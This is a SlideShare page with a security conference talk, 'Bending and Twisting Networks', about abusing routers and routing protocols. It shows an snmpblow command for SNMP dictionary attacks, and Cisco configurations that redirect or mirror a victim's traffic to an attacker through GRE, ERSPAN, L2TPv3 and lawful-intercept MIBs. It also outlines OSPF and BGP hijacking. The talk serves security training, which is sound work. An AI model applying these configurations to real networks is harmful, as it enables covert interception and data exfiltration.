SlideShare a Scribd company logo

TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin

EC-Council
EC-Council
Technology
1 of 22
Download to read offline
D-13-2856 1
Bending and Twisting Networks Rocket City - TakeDownCon Paul Coggin Internetwork Consulting Solutions Architect paul.coggin@dynetics.com @PaulCoggin D-13-2856 2
Bio of Author •  Network Security Architect – 18 Years Experience •  BS Math, MS Computer Information Systems, and Graduate Studies in IA and Security •  Certifications: EC-Council, Cisco, and ISC^2 •  EC-Council and Cisco Instructor •  Utility, Telecommunications, and Service Provider Experience -  Transport: Optical(DWDM, SONET), MPLS, 10G Ethernet -  Services: Voice, IPTV, Internet, MetroE, DSL -  OSS and Network Management -  Access Networks: Cable ISP, DSL, FTTX, GPON, Wireless, ATM, and Frame Relay -  Security: Penetration Testing, Security Architecture, and Vulnerability Analysis -  Routing and Switching D-13-2856 3
SNMP Blow Defeat SNMP w/ACL $ snmpblow.pl -s <NetMgt IP> -d <Target IP> -t <TFTP IP> -f cfg.txt < communities.txt Attacker Network Target Network Internet SNMP Dictionary Attack with IP spoof R&S SNMP ACL Filtered TFTP Server Upon guessing the SNMP community string the configuration file is downloaded to the attacker TFTP server Trusted Device Layer 2 and L3 Anti-spoof protection with a complex SNMP community string is recommended. SNMPv3 is highly encouraged. Reference: http://www.scanit.be/en_US/snmpblow.html D-13-2856 4
Policy Routing Override IP Routing Table       ISP A Internet A Route Map can over ride IP routing table and redirect specific traffic flows ISP B -Compromised Scenario 1 – Redirect Outbound Internet Rouge 4G router Scenario 2 – Redirect Traffic of interest out 4G or other RF network for undetected exfiltration Scenario 3 – Redirect Traffic of interest to enable a layer 3 Man in the Middle Attack Si   Vlan 3 Vlan 4 Vlan 2   Attacker System   -  Packet Sniffer -  IP Forwarding     Reference http://ptgmedia.pearsoncmg.com/images/1587052024/samplechapter/1587052024content.pdf D-13-2856 D-13-2856 5
GRE Tunnel Utilized to Sniff Across WAN Target Network   Hacked Router     Attacker Network Internet Packet Analyzer           -  -  -  -  GRE Tunnel is configured on the hacked router and the attacker’s router GRE Tunnel interfaces must be in common subnet Configure ACL to define traffic of interest on the hacked router Define a route map with the ACL and set the next hop to the attacker’s GRE tunnel interface IP address -  Similarly define an ACL & route map on the attacker router to redirect traffic to the packet analyzer Reference: http://www.symantec.com/connect/articles/cisco-snmp-configuration-attack-gre-tunnel 6 D-13-2856 D-13-2856
ERSPAN Enable Packet Capture Across Routed Network Target Network Hacked Router Attacker Network Internet Exfiltration of packet captures ERSPAN sends traffic over a GRE tunnel Packet Analyzer monitor session < session ID > type erspan-source source interface GigabitEthernet1/0/1 rx source interface GigabitEthernet1/0/2 tx source interface GigabitEthernet1/0/3 both destination erspan-id < erspan-flow-ID > ip address < remote ip > origin ip address < source IP > monitor session < session ID > type erspan-destination Source ip address < source IP > erspan-id < erspan-flow-ID > destination interface GigabitEthernet2/0/1 References: http://www.cisco.com/en/US/docs/ios/ios_xe/lanswitch/configuration/guide/span_xe.pdf D-13-2856 D-13-2856 7
DLSw Overview IBM Controller IBM Mainframe or AS 400 SDLC IPv4 Routed Backbone dlsw local-peer peer-id 192.168.2.1 dlsw remote-peer 0 tcp 192.168.3.1 dlsw bridge-group 1 ! interface Serial0/0 Ip address 192.168.1.2 255.255.255.0 ! interface Ethernet0/0 ip address 192.168.2.1 255.255.255.0 ! interface Serial0/1 description IBM controller configuration no ip address no ip directed-broadcast encapsulation sdlc no keepalive clockrate 56000 sdlc role prim-xid-poll sdlc vmac 0030.0000.8100 sdlc address C0 sdlc partner 4000.80c0.4040 C0 sdlc dlsw C0 ! bridge 1 protocol ieee dlsw local-peer peer-id 192.168.3.1 dlsw remote-peer 0 tcp promiscuous dlsw bridge-group 1 ! Interface serial0/0 Ip address 192.168.1.1 255.255.255.0 ! interface ethernet 0/0 ip address 192.168.3.1 255.255.255.0 bridge-group 1 ! bridge 1 protocol ieee DLSw is used to tunnel SNA and Netbios over IP References: http://www.cisco.com/en/US/tech/tk331/tk336/technologies_configuration_example09186a0080093ece.shtml http://www.cisco.com/en/US/tech/tk331/tk336/technologies_configuration_example09186a00801434cd.shtml?referring_site=smartnavRD 8 D-13-2856 D-13-2856
Tunnel IPv6 Over IPv4 Using DLSw If a router can be compromised with software that supports DLSw a host may be able to tunnel IPv6 traffic across the IPv4 routed Internet. This is not a documented or supported capability by Cisco. dlsw local-peer peer-id 192.168.2.1 dlsw remote-peer 0 tcp 192.168.3.1 dlsw bridge-group 1 ! interface Serial0/0 Ip address 192.168.1.2 255.255.255.0 ! interface FastEthernet0/0 ip address 192.168.2.1 255.255.255.0 bridge-group 1 ! ! bridge 1 protocol ieee IPv4 Routed Backbone IPv6 MITM across the DLSw tunnel??? To be Tested…. dlsw local-peer peer-id 192.168.3.1 dlsw remote-peer 0 tcp promiscuous dlsw bridge-group 1 ! Interface serial0/0 Ip address 192.168.1.1 255.255.255.0 ! Interface FastEthernet 0/0 ip address 192.168.3.1 255.255.255.0 bridge-group 1 ! bridge 1 protocol ieee References: http://www.cisco.com/en/US/tech/tk331/tk336/technologies_configuration_example09186a0080093ece.shtml http://www.cisco.com/en/US/tech/tk331/tk336/technologies_configuration_example09186a00801434cd.shtml?referring_site=smartnavRD 9 D-13-2856 D-13-2856
L2TPv3 Overview Pseudo-wire Layer 2 Connection Across Service Provider WAN       L2TPv3 Tunnel CE PE P PE CE Tunnel DSL PPPoE Subscribers Across the Service Provider Infrastructure for Termination at a Third Party Service Provider – Wholesale DSL Busiess Model           D-13-2856 D-13-2856 10
L2TPv3 MITM Across the Internet Target Network   Hacked Router     1.1.1.1 Attacker Network PE PE Internet 2.2.2.2 L2TPv3 Tunnel ARP Poison across the Internet Common Layer 2 Network l2tp-class l2tp-defaults retransmit initial retries 30 cookie-size 8 pseudowire-class ether-pw encapsulation l2tpv3 protocol none ip local interface Loopback0 interface Ethernet 0/0 xconnect 2.2.2.2 123 encapsulation l2tpv3 manual pw-class ether-pw l2tp id 222 111 l2tp cookie local 4 54321 l2tp cookie remote 4 12345 l2tp hello l2tp-defaults l2tp-class l2tp-defaults retransmit initial retries 30 cookie-size 8 pseudowire-class ether-pw encapsulation l2tpv3 protocol none ip local interface Loopback0 interface Ethernet 0/0 xconnect 1.1.1.1 123 encapsulation l2tpv3 manual pw-class ether-pw l2tp id 222 111 l2tp cookie local 4 54321 l2tp cookie remote 4 12345 l2tp hello l2tp-defaults          Reference: http://www.cisco.com/en/US/docs/ios-xml/ios/wan_lserv/configuration/xe-3s/asr1000/wan-l2-tun-pro-v3-xe.pdf D-13-2856 D-13-2856 11
Lawful Intercept Overview Voice-Call Agent Data-Radius, AAA Configuration Commands LI Administration Function Intercepting Control Element (ICE) Router Switch Request IRI Request Law Enforcement Agency (LEA) Mediation Device Collection Function Content Mediation Device Service Provider UDP Transport for Delivery SNMPv3 Reference: http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.2SX/lawful/intercept/65LI.pdf http://www.cisco.com/en/US/docs/routers/asr9000/software/asr9k_r4.1/security/configuration/guide/syssec_cg41asr9k_chapter3.pdf D-13-2856 D-13-2856 12
Lawful Intercept Identify Physical Source of Traffic DHCP request DHCP request with sub ID in Option identifier (RFC 3046) DHCP response with IP address Ethernet Access Domain MAC A MAC B ISP DSL CPE MAC C IP DSLAM PE-AGG L3VPN-PE ADSL modem Example Enterprise Network DHCP Server DHCP with Option 82 Support DHCP Option 82 provides the DSLAM and Switch Name and the Physical Interface That Requested a DHCP IP Address D-13-2856 D-13-2856 13
Lawful Intercept Exploit Scenario Target Network   Hacked Router     Destination Network Internet Attacker Network LI SNMP Trap Duplicate Copy of All Packets of Interest Packet Analyzer Snmp-server view <view-name> ciscoTap2MIB included Snmp-server view <view-name> ciscoIpTapMIB included Snmp-server group <group-name> v3 auth read <view-name> write <view-name) notify <view-name> Snmp-server host <ip-address> traps version 3 priv <username> udp-port <port-number> Snmp-server user <mduser-id> <groupname> v3 auth md5 <md-password>         References:   http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.2SX/lawful/intercept/65LI.pdf http://www.cisco.com/en/US/docs/routers/asr9000/software/asr9k_r4.1/security/configuration/guide/syssec_cg41asr9k_chapter3.pdf D-13-2856 D-13-2856 14
Two-Way Connection Via NAT Pivot to Target Cloud Provider Attacking System Managed IPTV Service Provider Internet IPTV Head End Default Route (MCAST RPF) Billing System Integration Middleware Target is the SAT IPTV Head End. Attacker is trying to pivot from Service Provider Network. Servers have route pointing back to SAT with no route to Internet. If the attacker can compromise the HE router then configure NAT two-way communication to the servers can be established. Setup Static NAT Translation No Route TV   downstream Routers Video On Demand Services upstream Head End Router Fiber Node C M RF Combiner STB                   Message On-­‐Line Network Guide p Power Ch   Menu USelect NLC Ch  Dn Multicast Video 3 D-13-2856 D-13-2856 IPTV SM Cable Modem Termination System (CMTS) Cable Routers 15 Pivot off Servers and Exploit Trust to target Cloud IPTV Provider
OSPF Overview       -  -  -  -  OSPF runs the SPF Algorithm OSPF advertises updates, routes etc with LSA’s Routes determined based on link cost Clear / MD5 Authentication Autononynmous System Border Router (ASBR) External Networks RIP, EIGRP, BGP, ISIS Area 0           Area 1 Area Border Router (ABR) ABR Area 2 Reference: http://www.cisco.com/en/US/tech/tk365/technologies_white_paper09186a0080094e9e.shtml D-13-2856 D-13-2856 16
Hack the Network Via OSPF       Autononynmous System Border Router (ASBR) External Network BGP, EIGRP, ISIS Area 0 Area 1 ABR DR           D-13-2856 D-13-2856 BDR Area Border Router (ABR) Area 2 OSPF Exploit Tools -  -  -  -  -  -  -  -  -  -  -  -  -  -  Quagga NRL Core(Network Simulator) Nemesis Loki G3SNDynamips Buy a router on eBay Hack a router and reconfigure Code one with Scapy IP Sorcery( IP Magic) Cain & Able to crack OSPF MD5 MS RRAS NetDude Collasoft Capsa Phenoelit IRPAS OSPF typically is implemented without any thought to security. LSA’s are multicast on the spoke LAN for any user to sniff without MD5. OSPF Attack Vectors -  Take over as DR - Inject routes to mask source of attack - DoS -  Inject routes for MITM - Add new routes to hacked router - Change interface bandwidth or use IP OSPF Cost for traffic engineering on hacked router 17
BGP Overview       AS 1 Route Reflector Route Reflector IBGP EBGP EBGP EBGP EBGP L2 Cross Connect   AS 4   AS 2 AS 3       References: http://www.cisco.com/en/US/tech/tk365/technologies_tech_note09186a00800c95bb.shtml#howbgpwork http://www.cisco.com/en/US/tech/tk365/tk80/tsd_technology_support_sub-protocol_home.html?referring_site=bodynav D-13-2856 D-13-2856 18
BGP Layer 2 Cross Connect Attacks - ARP Poisoning  - DoS  - Route Injection - How about ERSPAN,  L2Tpv3 or Lawful Intercept? Route Reflector AS 1 Route Reflector IBGP EBGP EBGP L2 Cross Connect           D-13-2856 D-13-2856 AS 2 EBGP AS 4 ERSPAN Destination AS 3 AS 5 Packet Analysis 19
BGP Hijack IP Network       AS 1 AS 5 Route Reflector Route Reflector Hijack a AS 4 IP subnet /24 AS 6 IBGP EBGP AS 7 EBGP EBGP L2 Cross Connect           D-13-2856 D-13-2856 AS 2 AS 3 The Longest IP Prefix Wins 20 AS 4
BGP IP Network and AS Hijacking AS 1       AS 5 Route Reflector Route Reflector AS 6 IBGP EBGP EBGP AS 2     Hijack AS 4   & IP subnet /24     D-13-2856 D-13-2856 EBGP L2 Cross Connect AS 3 The Longest IP Prefix Wins 21 AS 4
Questions??? Contact info Paul.coggin@dynetics.com @PaulCoggin D-13-2856 D-13-2856 22

Recommended

12 module
12 module12 module
12 module
Asif
 
BGPalerter: BGP prefix monitoring
BGPalerter: BGP prefix monitoringBGPalerter: BGP prefix monitoring
BGPalerter: BGP prefix monitoring
Bangladesh Network Operators Group
 
MANRS for Network Operators - bdNOG12
MANRS for Network Operators - bdNOG12MANRS for Network Operators - bdNOG12
MANRS for Network Operators - bdNOG12
Bangladesh Network Operators Group
 
16.) layer 3 (basic tcp ip routing)
16.) layer 3 (basic tcp ip routing)16.) layer 3 (basic tcp ip routing)
16.) layer 3 (basic tcp ip routing)
Jeff Green
 
Routing Security - its importance and status in South Asia
Routing Security - its importance and status in South AsiaRouting Security - its importance and status in South Asia
Routing Security - its importance and status in South Asia
Bangladesh Network Operators Group
 
Route Origin Validation With Routinator - A MANRS Approach for Operators
Route Origin Validation With Routinator - A MANRS Approach for OperatorsRoute Origin Validation With Routinator - A MANRS Approach for Operators
Route Origin Validation With Routinator - A MANRS Approach for Operators
Bangladesh Network Operators Group
 
JUNOS: OSPF and BGP
JUNOS: OSPF and BGPJUNOS: OSPF and BGP
JUNOS: OSPF and BGP
Zenith Networks
 
RPKI: An Operator’s Implementation
RPKI: An Operator’s ImplementationRPKI: An Operator’s Implementation
RPKI: An Operator’s Implementation
MyNOG
 

Recommended

12 module
12 module12 module
12 module
Asif
 
BGPalerter: BGP prefix monitoring
BGPalerter: BGP prefix monitoringBGPalerter: BGP prefix monitoring
BGPalerter: BGP prefix monitoring
Bangladesh Network Operators Group
 
MANRS for Network Operators - bdNOG12
MANRS for Network Operators - bdNOG12MANRS for Network Operators - bdNOG12
MANRS for Network Operators - bdNOG12
Bangladesh Network Operators Group
 
16.) layer 3 (basic tcp ip routing)
16.) layer 3 (basic tcp ip routing)16.) layer 3 (basic tcp ip routing)
16.) layer 3 (basic tcp ip routing)
Jeff Green
 
Routing Security - its importance and status in South Asia
Routing Security - its importance and status in South AsiaRouting Security - its importance and status in South Asia
Routing Security - its importance and status in South Asia
Bangladesh Network Operators Group
 
Route Origin Validation With Routinator - A MANRS Approach for Operators
Route Origin Validation With Routinator - A MANRS Approach for OperatorsRoute Origin Validation With Routinator - A MANRS Approach for Operators
Route Origin Validation With Routinator - A MANRS Approach for Operators
Bangladesh Network Operators Group
 
JUNOS: OSPF and BGP
JUNOS: OSPF and BGPJUNOS: OSPF and BGP
JUNOS: OSPF and BGP
Zenith Networks
 
RPKI: An Operator’s Implementation
RPKI: An Operator’s ImplementationRPKI: An Operator’s Implementation
RPKI: An Operator’s Implementation
MyNOG
 
225735365 ccna-study-guide-a
225735365 ccna-study-guide-a225735365 ccna-study-guide-a
225735365 ccna-study-guide-a
homeworkping10
 
CCNA Routing Fundamentals - EIGRP, OSPF and RIP
CCNA Routing Fundamentals - EIGRP, OSPF and RIPCCNA Routing Fundamentals - EIGRP, OSPF and RIP
CCNA Routing Fundamentals - EIGRP, OSPF and RIP
sushmil123
 
CCNA 200-120 Latest Dumps
CCNA 200-120 Latest DumpsCCNA 200-120 Latest Dumps
CCNA 200-120 Latest Dumps
slotiopo
 
31, Get more from your IPv4 resources
31, Get more from your IPv4 resources31, Get more from your IPv4 resources
31, Get more from your IPv4 resources
Bangladesh Network Operators Group
 
project on OSPF
project on OSPFproject on OSPF
project on OSPF
Om Prakash
 
RPKI Deployment Status in Bangladesh
RPKI Deployment Status in BangladeshRPKI Deployment Status in Bangladesh
RPKI Deployment Status in Bangladesh
Bangladesh Network Operators Group
 
MUM Middle East 2016 - System Integration Analyst
MUM Middle East 2016 - System Integration AnalystMUM Middle East 2016 - System Integration Analyst
MUM Middle East 2016 - System Integration Analyst
Fajar Nugroho
 
Ccna 1 5
Ccna 1 5Ccna 1 5
Ccna 1 5
Vahdet Shehu
 
Ccna 1 4
Ccna 1 4Ccna 1 4
Ccna 1 4
Vahdet Shehu
 
Top 20 ccna interview questions and answers pdf
Top 20 ccna interview questions and answers pdfTop 20 ccna interview questions and answers pdf
Top 20 ccna interview questions and answers pdf
Hub4Tech.com
 
Let's Have an IEEE 802.15.4 over LoRa Linux Device Driver for IoT
Let's Have an IEEE 802.15.4 over LoRa Linux Device Driver for IoTLet's Have an IEEE 802.15.4 over LoRa Linux Device Driver for IoT
Let's Have an IEEE 802.15.4 over LoRa Linux Device Driver for IoT
Jian-Hong Pan
 
Test
TestTest
Test
sinha.mrinal
 
Ip seminar
Ip seminarIp seminar
Ip seminar
YonasMegersa1
 
200-125-ccna-v3
200-125-ccna-v3200-125-ccna-v3
200-125-ccna-v3
Ibby Nuj
 
BGP Graceful Shutdown - IOS XR
BGP Graceful Shutdown - IOS XR BGP Graceful Shutdown - IOS XR
BGP Graceful Shutdown - IOS XR
Bertrand Duvivier
 
MUM Europe 2017 - Traffic Generator Case Study
MUM Europe 2017 - Traffic Generator Case StudyMUM Europe 2017 - Traffic Generator Case Study
MUM Europe 2017 - Traffic Generator Case Study
Fajar Nugroho
 
BGP persistence
BGP persistenceBGP persistence
BGP persistence
Bertrand Duvivier
 
Cloud Traffic Engineer – Google Espresso Project by Shaowen Ma
Cloud Traffic Engineer – Google Espresso Project by Shaowen MaCloud Traffic Engineer – Google Espresso Project by Shaowen Ma
Cloud Traffic Engineer – Google Espresso Project by Shaowen Ma
MyNOG
 
CCNA/Networking
CCNA/NetworkingCCNA/Networking
CCNA/Networking
Nettech India Thane @ 9870803004/5
 
BGP Traffic Engineering / Routing Optimisation
BGP Traffic Engineering / Routing OptimisationBGP Traffic Engineering / Routing Optimisation
BGP Traffic Engineering / Routing Optimisation
Andy Davidson
 
CCNA
CCNACCNA
CCNA
Abhishek Parihari
 
Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
ernestlithur
 

More Related Content

What's hot

project on OSPF
project on OSPFproject on OSPF
project on OSPF
Om Prakash
 
Let's Have an IEEE 802.15.4 over LoRa Linux Device Driver for IoT
Let's Have an IEEE 802.15.4 over LoRa Linux Device Driver for IoTLet's Have an IEEE 802.15.4 over LoRa Linux Device Driver for IoT
Let's Have an IEEE 802.15.4 over LoRa Linux Device Driver for IoT
Jian-Hong Pan
 
200-125-ccna-v3
200-125-ccna-v3200-125-ccna-v3
200-125-ccna-v3
Ibby Nuj
 

What's hot (20)

225735365 ccna-study-guide-a
225735365 ccna-study-guide-a225735365 ccna-study-guide-a
225735365 ccna-study-guide-a
 
CCNA Routing Fundamentals - EIGRP, OSPF and RIP
CCNA Routing Fundamentals - EIGRP, OSPF and RIPCCNA Routing Fundamentals - EIGRP, OSPF and RIP
CCNA Routing Fundamentals - EIGRP, OSPF and RIP
 
CCNA 200-120 Latest Dumps
CCNA 200-120 Latest DumpsCCNA 200-120 Latest Dumps
CCNA 200-120 Latest Dumps
 
31, Get more from your IPv4 resources
31, Get more from your IPv4 resources31, Get more from your IPv4 resources
31, Get more from your IPv4 resources
 
project on OSPF
project on OSPFproject on OSPF
project on OSPF
 
RPKI Deployment Status in Bangladesh
RPKI Deployment Status in BangladeshRPKI Deployment Status in Bangladesh
RPKI Deployment Status in Bangladesh
 
MUM Middle East 2016 - System Integration Analyst
MUM Middle East 2016 - System Integration AnalystMUM Middle East 2016 - System Integration Analyst
MUM Middle East 2016 - System Integration Analyst
 
Ccna 1 5
Ccna 1 5Ccna 1 5
Ccna 1 5
 
Ccna 1 4
Ccna 1 4Ccna 1 4
Ccna 1 4
 
Top 20 ccna interview questions and answers pdf
Top 20 ccna interview questions and answers pdfTop 20 ccna interview questions and answers pdf
Top 20 ccna interview questions and answers pdf
 
Let's Have an IEEE 802.15.4 over LoRa Linux Device Driver for IoT
Let's Have an IEEE 802.15.4 over LoRa Linux Device Driver for IoTLet's Have an IEEE 802.15.4 over LoRa Linux Device Driver for IoT
Let's Have an IEEE 802.15.4 over LoRa Linux Device Driver for IoT
 
Test
TestTest
Test
 
Ip seminar
Ip seminarIp seminar
Ip seminar
 
200-125-ccna-v3
200-125-ccna-v3200-125-ccna-v3
200-125-ccna-v3
 
BGP Graceful Shutdown - IOS XR
BGP Graceful Shutdown - IOS XR BGP Graceful Shutdown - IOS XR
BGP Graceful Shutdown - IOS XR
 
MUM Europe 2017 - Traffic Generator Case Study
MUM Europe 2017 - Traffic Generator Case StudyMUM Europe 2017 - Traffic Generator Case Study
MUM Europe 2017 - Traffic Generator Case Study
 
BGP persistence
BGP persistenceBGP persistence
BGP persistence
 
Cloud Traffic Engineer – Google Espresso Project by Shaowen Ma
Cloud Traffic Engineer – Google Espresso Project by Shaowen MaCloud Traffic Engineer – Google Espresso Project by Shaowen Ma
Cloud Traffic Engineer – Google Espresso Project by Shaowen Ma
 
CCNA/Networking
CCNA/NetworkingCCNA/Networking
CCNA/Networking
 
BGP Traffic Engineering / Routing Optimisation
BGP Traffic Engineering / Routing OptimisationBGP Traffic Engineering / Routing Optimisation
BGP Traffic Engineering / Routing Optimisation
 

Similar to TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin

Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
robertoxe
 
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 FinalExploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
masoodnt10
 
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
gogo6
 
Troubleshooting Firewalls (2012 San Diego)
Troubleshooting Firewalls (2012 San Diego)Troubleshooting Firewalls (2012 San Diego)
Troubleshooting Firewalls (2012 San Diego)
Cisco Security
 
introduction to security
introduction to securityintroduction to security
introduction to security
ahmad amiruddin
 

Similar to TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin (20)

CCNA
CCNACCNA
CCNA
 
Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
 
Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
 
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 FinalExploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
 
Обеспечение безопасности сети оператора связи с помощью BGP FlowSpec
Обеспечение безопасности сети оператора связи с помощью BGP FlowSpecОбеспечение безопасности сети оператора связи с помощью BGP FlowSpec
Обеспечение безопасности сети оператора связи с помощью BGP FlowSpec
 
Wan networks
Wan networksWan networks
Wan networks
 
TCP/IP Basics
TCP/IP BasicsTCP/IP Basics
TCP/IP Basics
 
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
 
Introduction 140318015826-phpapp01
Introduction 140318015826-phpapp01Introduction 140318015826-phpapp01
Introduction 140318015826-phpapp01
 
NetFlow Monitoring for Cyber Threat Defense
NetFlow Monitoring for Cyber Threat DefenseNetFlow Monitoring for Cyber Threat Defense
NetFlow Monitoring for Cyber Threat Defense
 
QoS Classification on Cisco IOS Router
QoS Classification on Cisco IOS RouterQoS Classification on Cisco IOS Router
QoS Classification on Cisco IOS Router
 
ccna summer training ppt ( Cisco certified network analysis) ppt. by Traun k...
ccna summer training ppt ( Cisco certified network analysis) ppt. by Traun k...ccna summer training ppt ( Cisco certified network analysis) ppt. by Traun k...
ccna summer training ppt ( Cisco certified network analysis) ppt. by Traun k...
 
Firewall
FirewallFirewall
Firewall
 
redGuardian DP100 large scale DDoS mitigation solution
redGuardian DP100 large scale DDoS mitigation solutionredGuardian DP100 large scale DDoS mitigation solution
redGuardian DP100 large scale DDoS mitigation solution
 
Training Day Slides
Training Day SlidesTraining Day Slides
Training Day Slides
 
Troubleshooting Firewalls (2012 San Diego)
Troubleshooting Firewalls (2012 San Diego)Troubleshooting Firewalls (2012 San Diego)
Troubleshooting Firewalls (2012 San Diego)
 
Fact Sheets : Network Status in Bangladesh
Fact Sheets : Network Status in BangladeshFact Sheets : Network Status in Bangladesh
Fact Sheets : Network Status in Bangladesh
 
Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
 
introduction to security
introduction to securityintroduction to security
introduction to security
 
IP Utilites
IP UtilitesIP Utilites
IP Utilites
 

More from EC-Council

Weaponizing OSINT – Hacker Halted 2019 – Michael James
Weaponizing OSINT – Hacker Halted 2019 – Michael James Weaponizing OSINT – Hacker Halted 2019 – Michael James
Weaponizing OSINT – Hacker Halted 2019 – Michael James
EC-Council
 
War Game: Ransomware – Global CISO Forum 2019
War Game: Ransomware – Global CISO Forum 2019War Game: Ransomware – Global CISO Forum 2019
War Game: Ransomware – Global CISO Forum 2019
EC-Council
 

More from EC-Council (20)

CyberOm - Hacking the Wellness Code in a Chaotic Cyber World
CyberOm - Hacking the Wellness Code in a Chaotic Cyber WorldCyberOm - Hacking the Wellness Code in a Chaotic Cyber World
CyberOm - Hacking the Wellness Code in a Chaotic Cyber World
 
Cloud Security Architecture - a different approach
Cloud Security Architecture - a different approachCloud Security Architecture - a different approach
Cloud Security Architecture - a different approach
 
Phases of Incident Response
Phases of Incident ResponsePhases of Incident Response
Phases of Incident Response
 
Weaponizing OSINT – Hacker Halted 2019 – Michael James
Weaponizing OSINT – Hacker Halted 2019 – Michael James Weaponizing OSINT – Hacker Halted 2019 – Michael James
Weaponizing OSINT – Hacker Halted 2019 – Michael James
 
Hacking Your Career – Hacker Halted 2019 – Keith Turpin
Hacking Your Career – Hacker Halted 2019 – Keith TurpinHacking Your Career – Hacker Halted 2019 – Keith Turpin
Hacking Your Career – Hacker Halted 2019 – Keith Turpin
 
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeHacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
 
Cloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff SilverCloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
 
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
 
Data in cars can be creepy – Hacker Halted 2019 – Andrea Amico
Data in cars can be creepy – Hacker Halted 2019 – Andrea AmicoData in cars can be creepy – Hacker Halted 2019 – Andrea Amico
Data in cars can be creepy – Hacker Halted 2019 – Andrea Amico
 
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel NaderBreaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
 
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian HilemanAre your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
 
War Game: Ransomware – Global CISO Forum 2019
War Game: Ransomware – Global CISO Forum 2019War Game: Ransomware – Global CISO Forum 2019
War Game: Ransomware – Global CISO Forum 2019
 
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
 
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...
 
Alexa is a snitch! Hacker Halted 2019 - Wes Widner
Alexa is a snitch! Hacker Halted 2019 - Wes WidnerAlexa is a snitch! Hacker Halted 2019 - Wes Widner
Alexa is a snitch! Hacker Halted 2019 - Wes Widner
 
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law EnforcementHacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
 
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
 
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
 
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
 

Recently uploaded

Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
